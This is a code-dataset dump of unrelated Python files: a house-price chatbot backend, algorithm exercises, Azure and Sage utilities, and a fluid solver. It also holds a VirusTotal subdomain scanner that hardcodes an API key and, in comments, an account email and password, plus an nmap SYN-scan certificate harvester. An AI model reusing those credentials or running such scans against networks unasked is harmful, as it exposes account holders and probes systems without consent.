requests.post(url, headers=headers, data=request_json)\n response_data = response.json()\n generated_message = response_data[\"choices\"][0][\"message\"][\"content\"]\n\n return generated_message\n\ndef getInfo(prompt):\n #adjustprompt = \"Please provide the values in the following format:\\n\\nneed: value\\ninfo: [key: value]\\ninfo: [key, value]\\n\\nExample: need: 5, info: [name: John], info: [age: 25]. Here is the prompt --> \" + prompt\n adjustprompt = \"Lire attentivement cette demande (\" + prompt + \" et fournir les valeurs explicitement dans cette forme : Need : value : [key : value], info : [key, value]..., (Example : need : 5, info : [name : John], info : [age : 25]).\"\n text = gptRequist(adjustprompt)\n need_pattern = r'need:\\s*([^,\\n]+)'\n need_match = re.search(need_pattern, text)\n need_value = need_match.group(1).strip() if need_match else None\n\n info_pattern = r'\\[([^:]+):\\s*([^,\\]]+)\\]'\n matches = re.findall(info_pattern, text)\n key_value_pairs = []\n if need_value != None:\n key_value_pairs.append(('need', need_value))\n for match in matches:\n key = match[0].strip()\n value = match[1].strip()\n if key != 'need': # Exclude 'need' from key_value_pairs\n key_value_pairs.append((key, value))\n \n return key_value_pairs\n\n\nextract_integer = lambda s: int(''.join(filter(str.isdigit, s))) if any(char.isdigit() for char in s) else None\ntransform_yes_no = lambda s: 1 if s.lower() == \"yes\" or s.lower()==\"true\" else 0\n\ndef getFeat(listfeat):\n json_file_path = 'feat.json'\n\n # Read the JSON file\n with open(json_file_path, 'r') as json_file:\n json_data = json.load(json_file)\n if listfeat != None:\n list_of_feat = []\n for key, value in json_data.items():\n for feat in listfeat:\n if value in feat[0]:\n if key not in ['waterfront']:\n list_of_feat.append((key, extract_integer(feat[1])))\n else:\n list_of_feat.append((key, transform_yes_no(feat[1])))\n #list_of_feat.append(('need', dict(listfeat)['need']))\n list_of_feat.append(('need', 'price'))\n else:\n return None\n print(list_of_feat)\n return dict(list_of_feat)\n\ndef imputer(feat):\n df = pd.read_csv(\"data_1.csv\")\n data = df.drop('id', axis=1)\n data['date'] = data['date'].str[4:6]\n col = list(data.columns)\n if feat==None:\n return None\n else:\n user_data = [0 for i in range(len(col))]\n for i in range(len(col)):\n user_data[i] = feat[col[i]] if col[i] in feat else np.nan\n\n X_missing = np.array(user_data)\n X_missing = np.reshape(X_missing, (1, X_missing.shape[0]))\n data = np.concatenate((data, X_missing), axis=0)\n\n knn_imputer = KNNImputer(n_neighbors=5)\n X_imputed = knn_imputer.fit_transform(data)\n\n return X_imputed[-1]\n\ndef catigories(df, column):\n one_hot_encoded = pd.get_dummies(df[column].astype(int), prefix=column)\n\n new_column_names = ['{}'.format(col) for col, value in zip(one_hot_encoded.columns, one_hot_encoded.columns)]\n one_hot_encoded.columns = [f'{x.split(\"_\")[0]}_{int(float(x.split(\"_\")[1]) * 10)}' for x in new_column_names]\n df = df.join(one_hot_encoded)\n\n return df.drop(column, axis=1)\n\ndef pre_process(imput):\n base = pd.read_csv(\"data_1.csv\")\n columns = ['date', 'price', 'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'waterfront', 'view', 'condition', 'grade', 'sqft_above', 'sqft_basement', 'yr_built', 'yr_renovated', 'zipcode', 'lat', 'long', 'sqft_living15', 'sqft_lot15']\n data_array = np.array(imput).reshape(1, -1)\n df = pd.DataFrame(data_array, columns=columns)\n df['floors'] = df['floors'].astype(int)\n df['view'] = df['view'].astype(int)\n df['condition'] = df['condition'].astype(int)\n df = catigories(df, 'floors')\n df = catigories(df, 'view')\n df = catigories(df, 'condition')\n base_year = 1900\n df['yr_built_encoded'] = df['yr_built'] - base_year\n df = df.drop('yr_built', axis=1)\n df['yr_renovated_encoded'] = df['yr_renovated'] - base_year\n df.loc[df['yr_renovated_encoded'] == -1900, 'yr_renovated_encoded'] = 0\n df = df.drop('yr_renovated', axis=1)\n zipcode_counts = base['zipcode'].value_counts()\n df['zipcode_freq_encoded'] = df['zipcode'].map(zipcode_counts)\n df = df.drop('zipcode', axis=1)\n df = catigories(df, 'date')\n featurs = ['Unnamed: 0', 'price', 'bedrooms', 'bathrooms', 'sqft_living',\n 'sqft_lot', 'waterfront', 'grade', 'sqft_above', 'sqft_basement', 'lat',\n 'long', 'sqft_living15', 'sqft_lot15', 'floors_10', 'floors_15',\n 'floors_20', 'floors_25', 'floors_30', 'floors_35', 'view_0', 'view_10',\n 'view_20', 'view_30', 'view_40', 'condition_10', 'condition_20',\n 'condition_30', 'condition_40', 'condition_50', 'yr_built_encoded',\n 'yr_renovated_encoded', 'zipcode_freq_encoded', 'date_10', 'date_20',\n 'date_30', 'date_40', 'date_50', 'date_60', 'date_70', 'date_80',\n 'date_90', 'date_100', 'date_110', 'date_120']\n output = pd.DataFrame()\n for item in featurs:\n if item not in df.columns:\n df[item] = 0\n output[item] = df[item]\n output.replace(True, 1, inplace=True)\n output = output.drop(\"Unnamed: 0\", axis=1)\n output.to_csv(\"output.csv\")\n return output\n\ndef predict(prompt):\n output = pre_process(list(imputer(getFeat(getInfo(prompt)))))\n X = output.drop('price', axis=1).to_numpy()\n X_normalized = scaler.transform(X)\n y = model.predict(X_normalized)\n return str(list(scaler2.inverse_transform(y.reshape(-1, 1)).reshape((1,)))[0])\n\ndef feedback(prompt):\n price = predict(prompt)\n adjustprompt = \"write a short respense to this ask (\" + prompt + \") by giving this suggation price: \" + price\n return gptRequist(adjustprompt)\n\n\n\"\"\"\nprompt = \"i want the price of a house in month 1 that contain 3 bedrooms and 1 bathroom and surface of living room is 250 with 1 floors in this zipcode 98178 that has water front with pool and basement of 2455\"\n\n\nprint(feedback(prompt))\"\"\"\n\n\n\n\n","repo_name":"iseddik/ChatEstimate","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17417390934","text":"from solver import Solver\nimport numpy as np\n\nS = Solver()\n \nsample = np.array([[5,3,0,0,7,0,0,0,0],\n [6,0,0,1,9,5,0,0,0],\n [0,9,8,0,0,0,0,6,0],\n [8,0,0,0,6,0,0,0,3],\n [4,0,0,8,0,3,0,0,1],\n [7,0,0,0,2,0,0,0,6],\n [0,6,0,0,0,0,2,8,0],\n [0,0,0,4,1,9,0,0,5],\n [0,0,0,0,8,0,0,7,9]])\n\nS.debug(False) #Don't print intermediate steps\n\n#Solver1\nprint(\"Solver1\")\nS.F = sample\nS.solve1()\nS.display()#Display solver 1 result\nprint(\"Number of guesses \"+ str(S.num_guesses))#Display solver1 number of guesses\n\n#Solver2\nprint(\"\\nSolver2\")\nS.F = sample\nS.solve2()\nS.display()#Display solver 2 result\nprint(\"Number of guesses \"+ str(S.num_guesses))#Display solver2 number of guesses\n","repo_name":"sumanthumesh/sudoku","sub_path":"run_example.py","file_name":"run_example.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14562195407","text":"import json\nfrom datetime import datetime\n\nimport requests\n\nHEADERS = {\n # API-ключ от аккаунта Евнгения\n # email - paholap485@musezoo.com\n # password - Password_123\n 'x-apikey': 'ab5e3e594eaece7f56782e83a27eef8ac11243306d0086e9377fec2fdc2545d0'\n}\n\n# URL для поиска поддоменов и их ip\nURL = 'https://www.virustotal.com/api/v3/domains/'\nDATE = datetime.now().strftime('%d_%m_%Y')\n\n\ndef collect_data(domain):\n response = requests.get(URL + f'{domain}/subdomains?limit=40', headers=HEADERS)\n with open(f'logs/{domain}-{DATE}.json', 'w') as file:\n json.dump(response.json(), file, indent=4, ensure_ascii=False)\n return response\n\n\ndef get_json(filename):\n with open(f'../logs/{filename}.json', 'r', encoding='utf-8') as file:\n json_res = json.load(file)\n return json_res\n\n\ndef parse_collection(response):\n if type(response) is dict:\n data = response['data']\n else:\n data = response.json()['data']\n res = []\n for item in data:\n id = item.get('id') # Домен\n atr = item.get('attributes') # В атрибуте лежит last_dns_records\n dns = atr.get('last_dns_records') # В last_dns_records лежит value c ip (ip есть только у type = A)\n for dnss in dns:\n type_name = dnss.get('type')\n if type_name == 'A':\n ip = dnss.get('value')\n res.append([id, ip])\n return res\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"TNB86/OSINT-monitoring-","sub_path":"OSINT_modules/Subdomain_scaner.py","file_name":"Subdomain_scaner.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31553268306","text":"import time\nclass Solution:\n #easy\n def strStr(self, haystack: str, needle: str) -> int:\n n = len(haystack)\n m = len(needle)\n if m == 0:\n return 0\n i=0\n j=0\n while i int:\n if haystack == None or needle == None:\n return -1\n #generate next array, need O(n) time\n i, j, m, n = -1, 0, len(haystack), len(needle)\n next = [-1] * n\n while j < n - 1:\n #needle[k] stands for prefix, neelde[j] stands for postfix\n if i == -1 or needle[i] == needle[j]:\n i, j = i + 1, j + 1\n next[j] = i\n else:\n i = next[i]\n # print(i,j,next[i],next[j])\n #check through the haystack using next, need O(m) time\n i = j = 0\n while i < m and j < n:\n if j == -1 or haystack[i] == needle[j]:\n i, j = i + 1, j + 1\n else:\n j = next[j]\n if j == n:\n return i - j\n return -1\n ###another\n def strStrAnotherKMP(self, haystack: str, needle: str) -> int:\n if not needle: return 0\n if not haystack: return -1\n\n next_arr = self.create_next(needle)\n i = j = 0\n\n while i < len(haystack) and j < len(needle):\n if haystack[i] == needle[j]:\n # Matched, so return the haystack's match start index.\n if j == len(needle) - 1:\n return i - len(needle) + 1\n i, j = i + 1, j + 1\n else:\n # Slide pattern over.\n if j: j = next_arr[j-1]\n else: i += 1\n\n return -1\n\n # Build next jump table.\n def create_next(self, pattern):\n next_arr = [0] * len(pattern)\n pre_i, suf_i = 0, 1\n\n while suf_i < len(pattern):\n # Found prefix-suffix match.\n if pattern[pre_i] == pattern[suf_i]:\n next_arr[suf_i] = pre_i + 1\n pre_i, suf_i = pre_i + 1, suf_i + 1\n else:\n if pre_i:\n pre_i = next_arr[pre_i-1]\n else:\n next_arr[suf_i] = 0\n suf_i += 1\n\n return next_arr\nif __name__ == '__main__':\n t = Solution();\n haystack= \"abcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdababcdabdabcdabdabcdabdabcdabdabcdabdabcdabdabcdabdabcdabdabcdabc\"\n needle =\"abcdabc\"\n print(time.time())\n print(t.strStrByKMP(haystack,needle))\n print(time.time())\n print(t.strStr(haystack,needle))\n print(time.time())\n\n\n","repo_name":"dreamingfish2011/leetcode","sub_path":"com/self/string/_28_ImplementstrStr.py","file_name":"_28_ImplementstrStr.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18051359437","text":"class Person:\n count_instance = 0\n def __init__(self):\n Person.count_instance += 1\n @classmethod\n def count_instances(cls):\n print(f\"You have created {cls.count_instance} instances of {cls.__name__} class...\")\n\n\"\"\"creating instances\"\"\" \np1 = Person()\np2 = Person()\n\n\"\"\"calling class method\"\"\"\nPerson.count_instances()\n","repo_name":"aworld01/cheatsheets","sub_path":"python/tutorials/python@harshitVashisth/5_oop/195_oop_class_method.py","file_name":"195_oop_class_method.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3615409752","text":"from azure.identity import DefaultAzureCredential\nfrom azure.mgmt.servicefabricmanagedclusters import ServiceFabricManagedClustersManagementClient\n\n\"\"\"\n# PREREQUISITES\n pip install azure-identity\n pip install azure-mgmt-servicefabricmanagedclusters\n# USAGE\n python managed_cluster_put_operation_example_max.py\n\n Before run the sample, please set the values of the client ID, tenant ID and client secret\n of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,\n AZURE_CLIENT_SECRET. For more info about how to get the value, please see:\n https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal\n\"\"\"\n\n\ndef main():\n client = ServiceFabricManagedClustersManagementClient(\n credential=DefaultAzureCredential(),\n subscription_id=\"00000000-0000-0000-0000-000000000000\",\n )\n\n response = client.managed_clusters.begin_create_or_update(\n resource_group_name=\"resRg\",\n cluster_name=\"myCluster\",\n parameters={\n \"location\": \"eastus\",\n \"properties\": {\n \"addonFeatures\": [\"DnsService\", \"BackupRestoreService\", \"ResourceMonitorService\"],\n \"adminPassword\": \"{vm-password}\",\n \"adminUserName\": \"vmadmin\",\n \"allowRdpAccess\": True,\n \"applicationTypeVersionsCleanupPolicy\": {\"maxUnusedVersionsToKeep\": 3},\n \"auxiliarySubnets\": [\n {\n \"enableIpv6\": True,\n \"name\": \"testSubnet1\",\n \"networkSecurityGroupId\": \"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/resRg/providers/Microsoft.Network/networkSecurityGroups/sn1\",\n \"privateEndpointNetworkPolicies\": \"enabled\",\n \"privateLinkServiceNetworkPolicies\": \"enabled\",\n }\n ],\n \"clientConnectionPort\": 19000,\n \"clusterCodeVersion\": \"7.1.168.9494\",\n \"clusterUpgradeMode\": \"Manual\",\n \"dnsName\": \"myCluster\",\n \"enableAutoOSUpgrade\": True,\n \"enableIpv6\": True,\n \"fabricSettings\": [\n {\"name\": \"ManagedIdentityTokenService\", \"parameters\": [{\"name\": \"IsEnabled\", \"value\": \"true\"}]}\n ],\n \"httpGatewayConnectionPort\": 19080,\n \"ipTags\": [{\"ipTagType\": \"FirstPartyUsage\", \"tag\": \"SQL\"}],\n \"loadBalancingRules\": [\n {\n \"backendPort\": 80,\n \"frontendPort\": 80,\n \"probePort\": 80,\n \"probeProtocol\": \"http\",\n \"protocol\": \"http\",\n },\n {\n \"backendPort\": 443,\n \"frontendPort\": 443,\n \"probePort\": 443,\n \"probeProtocol\": \"http\",\n \"protocol\": \"http\",\n },\n {\n \"backendPort\": 10000,\n \"frontendPort\": 10000,\n \"loadDistribution\": \"Default\",\n \"probePort\": 10000,\n \"probeProtocol\": \"http\",\n \"protocol\": \"tcp\",\n },\n ],\n \"networkSecurityRules\": [\n {\n \"access\": \"allow\",\n \"description\": \"Test description\",\n \"destinationAddressPrefixes\": [\"*\"],\n \"destinationPortRanges\": [\"*\"],\n \"direction\": \"inbound\",\n \"name\": \"TestName\",\n \"priority\": 1010,\n \"protocol\": \"tcp\",\n \"sourceAddressPrefixes\": [\"*\"],\n \"sourcePortRanges\": [\"*\"],\n },\n {\n \"access\": \"allow\",\n \"destinationAddressPrefix\": \"*\",\n \"destinationPortRange\": \"33500-33699\",\n \"direction\": \"inbound\",\n \"name\": \"AllowARM\",\n \"priority\": 2002,\n \"protocol\": \"*\",\n \"sourceAddressPrefix\": \"AzureResourceManager\",\n \"sourcePortRange\": \"*\",\n },\n ],\n \"serviceEndpoints\": [{\"locations\": [\"eastus2\", \"usnorth\"], \"service\": \"Microsoft.Storage\"}],\n \"useCustomVnet\": True,\n \"zonalResiliency\": True,\n \"zonalUpdateMode\": \"Fast\",\n },\n \"sku\": {\"name\": \"Basic\"},\n \"tags\": {},\n },\n ).result()\n print(response)\n\n\n# x-ms-original-file: specification/servicefabricmanagedclusters/resource-manager/Microsoft.ServiceFabric/preview/2023-02-01-preview/examples/ManagedClusterPutOperation_example_max.json\nif __name__ == \"__main__\":\n main()\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/servicefabricmanagedclusters/azure-mgmt-servicefabricmanagedclusters/generated_samples/managed_cluster_put_operation_example_max.py","file_name":"managed_cluster_put_operation_example_max.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"27681839073","text":"from collections import OrderedDict\nfrom sage.all import (operator, flatten, PolynomialRing, SR, QQ, ZZ, RR, sage, oo)\nfrom vu_common import (pause, get_logger,is_iterable, is_str, is_empty) \n \nis_sage_expr = lambda x: isinstance(x, sage.symbolic.expression.Expression)\nis_sage_real = lambda x: isinstance(x, sage.rings.real_mpfr.RealLiteral)\nis_sage_int = lambda x: isinstance(x, sage.rings.integer.Integer)\nis_sage_num = lambda x: is_sage_real(x) or is_sage_int(x)\ndef is_sage_inf(x):\n \"\"\"\n Example:\n sage: is_sage_inf(oo)\n True\n sage: is_sage_inf(-oo)\n True\n sage: is_sage_inf(oo+3)\n True\n sage: is_sage_inf(oo-3)\n True\n sage: is_sage_inf(SR(-oo))\n True\n sage: is_sage_inf(x)\n False\n sage: is_sage_inf(x+3)\n False\n sage: is_sage_inf(8)\n False\n \"\"\"\n try:\n return x.is_infinity()\n except AttributeError:\n return x == oo or x == -oo\n\nis_sage_int_inf = lambda x: is_sage_int(x) or is_sage_inf(x)\nto_sage_int = lambda x: x if is_sage_int(x) else ZZ(x)\n\n\ndef is_sage_symbol(s):\n \"\"\"\n sage: assert is_sage_symbol(x)\n sage: assert not is_sage_symbol(x+1)\n sage: assert not is_sage_symbol(1)\n \"\"\"\n try:\n return s.is_symbol()\n except AttributeError:\n return False\n\ndef is_sage_rel(f, rel=None):\n \"\"\"\n sage: assert not is_sage_rel(7.2)\n sage: assert not is_sage_rel(x)\n sage: assert not is_sage_rel(x+7)\n sage: assert is_sage_rel(x==3,operator.eq)\n\n sage: assert is_sage_rel(x<=3,operator.le)\n sage: assert not is_sage_rel(x<=3,operator.lt)\n sage: assert not is_sage_rel(x+3,operator.lt)\n\n sage: y = var('y')\n sage: assert is_sage_rel(x+y<=3)\n \"\"\"\n\n try:\n if not f.is_relational(): \n return False\n\n if rel is None:\n return True\n else:\n return f.operator() == rel\n\n except AttributeError:\n return False\n \nis_sage_eq = lambda f: is_sage_rel(f, operator.eq)\n\ndef get_vars(ps):\n \"\"\"\n Returns a list of uniq variables from a list of properties\n\n Examples:\n\n sage: var('a b c x')\n (a, b, c, x)\n\n sage: assert [a, b, c, x] == get_vars([x^(a*b) + a**2+b+2==0, c**2-b==100, b**2 + c**2 + a**3>= 1])\n sage: assert get_vars(a**2+b+5*c+2==0) == [a, b, c]\n sage: assert get_vars(x+x^2) == [x]\n sage: assert get_vars([3]) == []\n sage: assert get_vars((3,'x + c',x+b)) == [b, x]\n \"\"\"\n\n ps = ps if is_iterable(ps) else [ps]\n\n vs = flatten([p.variables() for p in ps if is_sage_expr(p)])\n\n return sorted(set(vs), key=str)\n\n\ndef get_coefs_terms(p, base_ring = QQ, as_dict=False):\n \"\"\"\n Returns the Coefs and Terms of a given expression\n\n Examples:\n sage: assert get_coefs_terms(x) == ([1], [x])\n\n sage: assert get_coefs_terms(x,as_dict=True) == {x: 1}\n\n sage: var('a b c')\n (a, b, c)\n\n sage: assert get_coefs_terms(a**2+b+5*c+2==0) == ([1, 1, 5, 2], [a^2, b, c, 1])\n sage: assert get_coefs_terms(a**2+b+5*c+2==0, as_dict=True) == {b: 1, 1: 2, a^2: 1, c: 5}\n\n sage: assert get_coefs_terms(10/3*a**2+3*b+5*c+2) == ([10/3, 3, 5, 2], [a^2, b, c, 1])\n sage: assert get_coefs_terms(10/3*a**2+3*b+5*c+2, as_dict=True) == {b: 3, 1: 2, a^2: 10/3, c: 5}\n\n sage: assert get_coefs_terms(a+b<=3, as_dict=True) == {1: -3, b: 1, a: 1}\n sage: assert all(is_sage_int(v) for v in get_coefs_terms(a+b<=3, as_dict=True, base_ring=ZZ).values())\n\n #sage 6.2 breaks this\n #sage: assert get_coefs_terms(a - b <= oo) == ([1, -1, -infinity], [a, b, 1])\n\n sage: assert get_coefs_terms(SR(7), as_dict=True) == {1: 7}\n sage: assert get_coefs_terms(SR(3))==([3], [1])\n sage: assert get_coefs_terms(SR(oo))==([+Infinity], [1])\n sage: assert get_coefs_terms(SR(-oo)) == ([-Infinity], [1])\n sage: assert get_coefs_terms(a + b <= .9,base_ring=ZZ) == ([1, 1, -0.900000000000000], [a, b, 1])\n \n sage: assert is_sage_int(get_coefs_terms(SR(7),base_ring=ZZ,as_dict=True).values()[0])\n\n \"\"\"\n\n use_wrong_base_ring = False\n\n if is_sage_rel(p):\n p = mk_rhs_0(p).lhs()\n\n if p.is_integer() or p.is_real():\n ts = [SR(1)]\n cs = [p if p.is_infinity() else base_ring(p)]\n\n else:\n ss = get_vars(p)\n assert not is_empty(ss), (p,ss)\n\n mk_pr = lambda b, p: PolynomialRing(b, ss, None if len(ss) >= 2 else 1)(p)\n\n try:\n pr_p = mk_pr(base_ring, p)\n except TypeError:\n \n if base_ring == RR:\n #if cannot do over RR then return None\n return None \n else:\n #otherwise, try with RR\n try:\n pr_p = mk_pr(RR,p)\n use_wrong_base_ring = True\n except Exception as msg:\n return None\n \n cs = pr_p.coefficients()\n ts = map(SR, pr_p.monomials())\n\n\n if use_wrong_base_ring:\n ts = [SR(1) if bool(t.is_one()) else t for t in ts]\n cs_ = []\n for c in cs:\n if c == oo:\n cs_.append(oo)\n elif c == -oo:\n cs_.append(-oo)\n else:\n try:\n cs_.append(base_ring(c))\n except ValueError:\n cs_.append(c)\n except TypeError:\n cs_.append(c)\n cs = cs_\n \n assert all(is_sage_expr(t) for t in ts), ts\n\n if as_dict:\n d = OrderedDict()\n for t,c in zip(ts,cs):\n d[t] = c\n return d\n else:\n return cs,ts\n\n\ndef mk_rhs_0(p):\n \"\"\"\n sage: var('x,y')\n (x, y)\n sage: mk_rhs_0(x - y >= 3)\n x - y - 3 >= 0\n\n sage: mk_rhs_0(x - y - 3 >= 0)\n x - y - 3 >= 0\n\n\n sage: mk_rhs_0(0 <= x - y - 3)\n -x + y + 3 <= 0\n\n sage: mk_rhs_0(0 == x)\n -x == 0\n\n sage: mk_rhs_0(10 == -x)\n x + 10 == 0\n\n #Sage 5.11 broke all these (i.e., broke lhs.add(..,hold=))\n # sage: mk_rhs_0(x <= oo)\n # x - Infinity <= 0\n\n # sage: mk_rhs_0(x <= -oo)\n # x + +Infinity <= 0\n\n # sage: mk_rhs_0(x >= oo)\n # x - Infinity >= 0\n\n # sage: mk_rhs_0(oo >= x)\n # +Infinity - x >= 0\n\n sage: mk_rhs_0(x - y - 3)\n Traceback (most recent call last):\n ...\n AssertionError: x - y - 3\n\n\n \"\"\"\n assert is_sage_rel(p), p\n\n rhs = p.rhs()\n lhs = p.lhs()\n if not rhs.is_zero():\n lhs = lhs.add(-rhs, hold=(rhs.is_infinity() or lhs.is_infinity()))\n rhs = 0\n p = p.operator()(lhs, rhs)\n\n return p\n\n\n# def myreduce(op, ls):\n# \"\"\"\n# Apply operator op to list of arguments\n\n# Note, it seems the above arguments are *enough*, no need to implement for (-,div) etc because the function that calls this will break x - y to myreduce(op,[x,-y]) or x / y to myreduce(op,[x,1/y]) and 1/y => mul(1,y^{-1})\n\n# sage: assert myreduce(operator.add, [x,x]) == 2*x\n# sage: assert myreduce(operator.add, [3,x]) == x + 3\n# sage: myreduce(operator.le, [3,x])\n# 3 <= x\n# sage: assert myreduce(operator.pow,[3,x]) == 3^x\n\n\n# \"\"\"\n# if __debug__:\n# assert len(ls) >= 2, ls\n# assert op in [operator.add,operator.mul,\n# operator.pow,operator.eq,operator.ne,\n# operator.le,operator.lt,operator.ge,operator.gt], op\n# return reduce(lambda a, b: op(a,b), ls[1:], ls[0])\n\n\n\n# def mk_expr(expr, d, ring_typ=ZZ):\n# \"\"\"\n# Make a new expression like expr but with all vars in expr replaced\n# with those in dictionary d. Used when subs() is not applicable\n# sage: y = var('y')\n\n# sage: lp = MixedIntegerLinearProgram()\n# sage: s0 = lp['s0']\n# sage: s1 = lp['s1']\n# sage: d = {x:s0,y:s1}\n# sage: mk_expr(x+y+3, d)\n# 3 + x_0 + x_1\n# sage: mk_expr(x+y+3<=8,d)\n# 3 + x_0 + x_1 <= 8\n# sage: mk_expr(x==y+5,d)\n# x_0 == 5 + x_1\n# \"\"\"\n# def retval(expr):\n# if is_sage_symbol(expr): #symbol, e.g. x\n# return d[expr]\n# else: #const , e.g. 3\n# return ring_typ(expr)\n# try:\n# oprs = expr.operands()\n# except AttributeError:\n# #e.g. const 3, .5\n# return retval(expr)\n\n# if is_empty(oprs): #symbol\n# return retval(expr)\n# else:\n# oprs = [mk_expr(o,d) for o in oprs]\n# print oprs\n# rs = myreduce(expr.operator(), oprs)\n# return rs\n\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"dynaroars/numinv","sub_path":"sageutil.py","file_name":"sageutil.py","file_ext":"py","file_size_in_byte":8506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"842380339","text":"#!/usr/bin/env python3\n\n#\n# under root\n# pip3.8 install --user python3-nmap\n# pip3.8 install --user pyopenssl\n#\n\nfrom nmap3 import NmapScanTechniques\nimport nmap3\nimport OpenSSL\nimport ssl\nimport sys\n\n\n\nh = NmapScanTechniques()\ntcp_syn_scan = h.nmap_syn_scan(sys.argv[1])\n\nprint('\\n')\nprint('{0:29}|{1:45}|{2}'.format('host',' cert serial Number', ' cert CN'))\nprint('-----------------------------|---------------------------------------------|--------------')\n\n\nfor host in tcp_syn_scan.keys():\n for port in tcp_syn_scan[host]:\n try:\n if \"host\" in port:\n if port['portid'] == '443':\n cert_pem = ssl.get_server_certificate((port['host'], 443))\n x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_pem)\n subject = x509.get_subject()\n print('{0:30}{1:46}{2}'.format(port['host'],hex(x509.get_serial_number()),subject.CN))\n except:\n break\n","repo_name":"ivan-1989/cert-scaner-nmap","sub_path":"cert-scaner-nmap.py","file_name":"cert-scaner-nmap.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71265764641","text":"import numpy as np\nimport os\n\n\nclass Boundary:\n def __init__(self, boundary_type, boundary_value):\n self.DefineBoundary(boundary_type, boundary_value)\n\n def DefineBoundary(self, boundary_type, boundary_value):\n self.type = boundary_type\n self.value = boundary_value\n\n\nclass Space:\n def __init__(self):\n pass\n\n def CreateMesh(self, rowpts, colpts):\n # Domain gridpoints\n self.rowpts = rowpts\n self.colpts = colpts\n # Velocity matrices\n self.u = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.v = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.u_star = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.v_star = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.u_next = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.v_next = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.u_c = np.zeros((self.rowpts, self.colpts))\n self.v_c = np.zeros((self.rowpts, self.colpts))\n # Pressure matrices\n self.p = np.zeros((self.rowpts + 2, self.colpts + 2))\n self.p_c = np.zeros((self.rowpts, self.colpts))\n\n # Set default source term\n self.SetSourceTerm()\n\n def SetDeltas(self, breadth, length):\n self.dx = length / (self.colpts - 1)\n self.dy = breadth / (self.rowpts - 1)\n\n def SetInitialU(self, U):\n self.u = U * self.u\n\n def SetInitialV(self, V):\n self.v = V * self.v\n\n def SetInitialP(self, P):\n self.p = P * self.p\n\n def SetSourceTerm(self, S_x=0, S_y=0):\n self.S_x = S_x\n self.S_y = S_y\n\n\nclass Fluid:\n def __init__(self, rho, mu):\n self.SetFluidProperties(rho, mu)\n\n def SetFluidProperties(self, rho, mu):\n self.rho = rho\n self.mu = mu\n\n\n# Note: The arguments to the function are all objects of our defined classes\n# Set boundary conditions for horizontal velocity\ndef SetUBoundary(space, left, right, top, bottom):\n if left.type == \"D\":\n space.u[:, 0] = left.value\n elif left.type == \"N\":\n space.u[:, 0] = -left.value * space.dx + space.u[:, 1]\n\n if right.type == \"D\":\n space.u[:, -1] = right.value\n elif right.type == \"N\":\n space.u[:, -1] = right.value * space.dx + space.u[:, -2]\n\n if top.type == \"D\":\n space.u[-1, :] = 2 * top.value - space.u[-2, :]\n elif top.type == \"N\":\n space.u[-1, :] = -top.value * space.dy + space.u[-2, :]\n\n if bottom.type == \"D\":\n space.u[0, :] = 2 * bottom.value - space.u[1, :]\n elif bottom.type == \"N\":\n space.u[0, :] = bottom.value * space.dy + space.u[1, :]\n\n\n# Set boundary conditions for vertical velocity\ndef SetVBoundary(space, left, right, top, bottom):\n if left.type == \"D\":\n space.v[:, 0] = 2 * left.value - space.v[:, 1]\n elif left.type == \"N\":\n space.v[:, 0] = -left.value * space.dx + space.v[:, 1]\n\n if right.type == \"D\":\n space.v[:, -1] = 2 * right.value - space.v[:, -2]\n elif right.type == \"N\":\n space.v[:, -1] = right.value * space.dx + space.v[:, -2]\n\n if top.type == \"D\":\n space.v[-1, :] = top.value\n elif top.type == \"N\":\n space.v[-1, :] = -top.value * space.dy + space.v[-2, :]\n\n if bottom.type == \"D\":\n space.v[0, :] = bottom.value\n elif bottom.type == \"N\":\n space.v[0, :] = bottom.value * space.dy + space.v[1, :]\n\n\n# Set boundary conditions for pressure\ndef SetPBoundary(space, left, right, top, bottom):\n if left.type == \"D\":\n space.p[:, 0] = left.value\n elif left.type == \"N\":\n space.p[:, 0] = -left.value * space.dx + space.p[:, 